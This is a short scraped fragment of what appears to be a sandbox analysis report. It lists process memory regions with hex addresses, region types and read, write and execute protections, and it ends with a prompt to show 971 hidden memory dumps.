page read and write
|
||
5B0000
|
heap private
|
page read and write
|
||
7FF00280000
|
unkown
|
page read and write
|
||
7FF00290000
|
unkown
|
page execute and read and write
|
||
5A30000
|
heap private
|
page read and write
|
||
380000
|
unkown
|
page read and write
|
||
18A000
|
unkown
|
page execute and read and write
|
||
365B000
|
unkown
|
page read and write
|
||
7FFFFF10000
|
unkown
|
page execute and read and write
|
||
1C2000
|
unkown
|
page read and write
|
There are 971 hidden memdumps, click here to show them.